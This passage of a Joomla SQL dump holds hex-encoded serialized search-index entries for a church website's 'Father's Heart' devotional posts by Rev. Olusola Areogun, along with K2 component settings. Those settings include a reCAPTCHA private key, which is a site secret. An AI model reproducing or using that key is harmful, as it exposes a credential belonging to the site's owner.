0476f642077697468206d652c2077652077696c6c20646f2069742e204c657420796f75722068656172742062652066696c6c6564207769746820666169746820617320796f7520676f20696e746f20323031372e20446f6ee28099742061736b20666f722076616c6c657920696e20323031372c2061736b20666f72206d6f756e7461696e73213c2f703e0d0a3c703e2d20537069726974206f662054727574683a2054686572652061726520616c6c206b696e64206f66206576696c20646563657074696f6e207468617420746865204269626c6520736179732077696c6c2074616b6520706c61636520696e207468657365206c617374206461797320627574206d656e20776974682074686520737069726974206f662074727574682077696c6c206e6f742062652064656365697665642e2049742074616b65732074686520737069726974206f6620747275746820746f2070726f746563742061206d616e207768656e20686520696e74657261637473207769746820646563657074697665206d656e20696e20746865206172656e61206f66206c6966652e20596f75206d7573742077656172207468617420737069726974207468697320796561722e3c2f703e0d0a3c703e2d20537069726974206f6620436f75726167653a204974e28099732077686174206d616b65732061206d616e20746f206b65657020646f696e67207768617473207269676874206576656e207768656e206865206973206166726169642e20426f6c646e6573732069732061626f7574206d616b696e6720666163652c20636f75726167652069732061207468696e67206f66207468652068656172742e204120626f6c64206d616e2063616e2073746172742061206669676874206275742061206d616e206f6620c2a0636f75726167652077696c6c2061637475616c6c7920656e64207468652066696768742e204265666f726520476f642074616b657320796f7520746f2061206675747572652c20686520776f726b732075706f6e20796f757220686561727420746f206769766520796f7520746865206b696e64206f6620686561727420746861742063616e2074616b652074686520726f61642e3c2f703e0d0a3c703e2d20537069726974206f6620566963746f72793a2054686520737069726974206f6620766963746f7279206173737572657320766963746f72792065766572792074696d652e2057696e6e696e6720697320616e206576656e742c2062757420612077696e6e65722069732061207370697269742e205468657265206973206120646966666572656e6365206265747765656e20616e206576656e7420616e642061207370697269742e2054686520737069726974206f6620766963746f727920646f6573206e6f74207361792074686520656e656d792077696c6c206e6f7420636f6d652c206974206a7573742074656c6c732074686520656e656d792c20e2809c6c697374656e20746f206d652c20796f75e280997665207069636b6564207468652077726f6e67206f70706f6e656e742c2067657420726561647920746f206c6f73652062656361757365204920616d206f726461696e656420746f2077696e2ee2809d20416e642068652077696c6c206769766520697420776861742069742074616b65732e2054686520737069726974206f6620766963746f7279206b6e6f7773206e6f206465666561743b2043616c656220636172726965642069742c205061756c20616c736f20636172726965642069742e20596f75206d757374206361727279206974213c2f703e0d0a3c703e2d20537069726974206f66204c6966653a2054686572652069732061206c69666520746861742074686520656e656d792063616e6e6f7420737465616c2e3c2f703e0d0a3c703e2d20537069726974206f66204163636f756e746162696c6974793a20546869732073706972697420697320776861742077696c6c20646f20616c6c20746861742069742074616b6573206c617766756c6c7920617420616c6c2074696d65732c207768696c6520796f752061726520706c656173696e6720476f642e2044616e69656c20636172726965642074686174205370697269742c204a6f7365706820636172726965642074686174207370697269742e205468657265e2809973206e6f626f6479207468617420737563636565647320696e206c696665e280956c6567616c6c79206f7220696c6c6567616c6c79e280957468617420646f6573206e6f7420666163652074686520616363757365722e20546865206f6e6c7920706572736f6e20746861742074686520616363757365722077696c6c206e6f7420666163652069732061206661696c7572652e2042757420746865206d696e75746520796f752064656369646520746f206a6f696e207468652072616e6b206f6620746865207375636365737366756c2c2067657420726561647920666f72207468652061636375736174696f6e2e204c657420796f7572206163636f756e746162696c697479206265207265616479206265666f7265207468652061636375736174696f6e20636f6d65732e2054686520737069726974206f66206163636f756e746162696c69747920697320746865207370697269742074686174207061797320617474656e74696f6e20746f2064657461696c732e2050656f706c652077696c6c2063616c6c20796f7520616c6c206b696e64206f662066756e6e79206e616d65732c2062757420746865207269676874207370697269742077696c6c206769766520796f7520746865206675747572652e204e6f626f647920686173206120667574757265206361727279696e672077726f6e67207370697269742e3c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a657375732e3c2f703e0d0a3c703e3c656d3e3c7374726f6e673e476f64e28099732073657276616e742c3c2f7374726f6e673e3c2f656d3e3c2f703e0d0a3c703e3c656d3e3c7374726f6e673e5265762e204f6c75736f6c61204172656f67756e3c2f7374726f6e673e3c2f656d3e3c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30312d31352031353a34383a3433223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2234223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a32393a2231333a6661746865722d732d6865617274682d30382d30312d32303136223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34373a22636f6d706f6e656e742f6b322f6974656d2f31332d6661746865722d732d6865617274682d30382d30312d32303136223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3133223b733a353a22726f757465223b733a36363a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d31333a6661746865722d732d6865617274682d30382d30312d32303136223b733a353a227469746c65223b733a32373a224661746865722773204865617274202830382f30312f3230313729223b733a31313a226465736372697074696f6e223b733a3335363a2220446561726c792062656c6f7665642c2049742069732032303137204d657263792120546865204c6f7264206861732073706f6b656e20657870726573736c7920746f20757320636f6e6365726e696e672074686973207965617220616e6420746865726520686173206265656e207261696e206f6620496d706172746174696f6e732075706f6e2075732e20416c6c20746865736520696d706172746174696f6e7320616e6420436f76656e616e74732077696c6c206d61726b20796f7572206c6966652074686973207965617220646573706974652074686520736974756174696f6e2061726f756e6420796f752e205468657265206d69676874206265206576696c207265706f7274732062757420796f75206d75737420686f6c64206661737420746f2074686520776f726473207468617420476f642068617320676976656e20757320696e2074686520686f75736520666f72207468697320796561722e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30312d30372032313a34383a3437223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30312d30372032313a34383a3437223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(255, 'index.php?option=com_k2&view=item&id=18', 'index.php?option=com_k2&view=item&id=18:from-our-father-s-heart', 'From our Father\'s Heart  (22/01/2017)', ' Dearly Beloved of God, 2017 God wants you to get it right in your walk with Him. Once you are able to get it right, it becomes easier for God to work with you. Let me show you some keys to getting it right so that you will be able to progress to the next stage which is getting better. ', '2017-06-25 14:19:31', '827152905417bbb4fa751190528d233a', 1, 1, 1, '*', '2017-01-22 10:19:20', '0000-00-00 00:00:00', '2017-01-22 10:19:20', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223138223b733a353a22616c696173223b733a32333a2266726f6d2d6f75722d6661746865722d732d6865617274223b733a373a2273756d6d617279223b733a3330323a223c703e446561726c792042656c6f766564206f6620476f642c3c2f703e0d0a3c703e3230313720476f642077616e747320796f7520746f2067657420697420726967687420696e20796f75722077616c6b20776974682048696d2e204f6e636520796f75206172652061626c6520746f206765742069742072696768742c206974206265636f6d65732065617369657220666f7220476f6420746f20776f726b207769746820796f752e204c6574206d652073686f7720796f7520736f6d65206b65797320746f2067657474696e6720697420726967687420736f207468617420796f752077696c6c2062652061626c6520746f2070726f677265737320746f20746865206e6578742073746167652077686963682069732067657474696e67206265747465722e3c2f703e0d0a223b733a343a22626f6479223b733a313933363a220d0a3c703e312e204469736369706c696e653a20596f75206d757374206469736369706c696e6520796f7572206d6f75746820746f20736179207768617420476f6420697320736179696e672e20476f642077696c6c206f6e6c7920776f726b20776974682048697320776f7264732e204a6572656d6961682031207665727365203132207361797320e2809c205468656e207361696420746865204c6f726420756e746f206d652c2054686f7520686173742077656c6c207365656e3a20666f7220492077696c6c2068617374656e206d7920776f726420746f20706572666f726d2069742ee2809d3c2f703e0d0a3c703e322e20576174636820796f7572206d6f7574683a204c6561726e20746f20636f6e74726f6c20616e642070726f7465637420796f7572206d6f7574682e20596f7572206d6f757468206d75737420626520574f52442d434f4e54524f4c4c45442e2054686973206973206e6f742061206a6f6b652c2074686973206973206d7920333474682079656172206f66206f626579696e6720476f6427732063616c6c2e2050656f706c6520617265206c6f6f6b696e672061726f756e6420616e6420747279696e6720746f2066696e64206578706c616e6174696f6e732061626f75742077686174206973206d616b696e67207468696e67732068617070656e20696e20447265616d2043656e7472652e20536f6d65206f6620796f75206172652068616e67696e67206f757420696e2063687572636820776974686f757420756e6465727374616e64696e6720746865207472757468732074686174206d616b65207468696e67732068617070656e2e20476f64206973206e6f74207761746368696e6720796f757220636f6d706c61696e74732c204865206973207761746368696e6720666f722048697320776f7264732e20536f6d6520706173746f7273207468696e6b207468617420746865726520697320736f6d657468696e6720656c73652074686174206973206d616b696e67207468696e677320776f726b2061742074686520447265616d2043656e7472652e205468657265206973206e6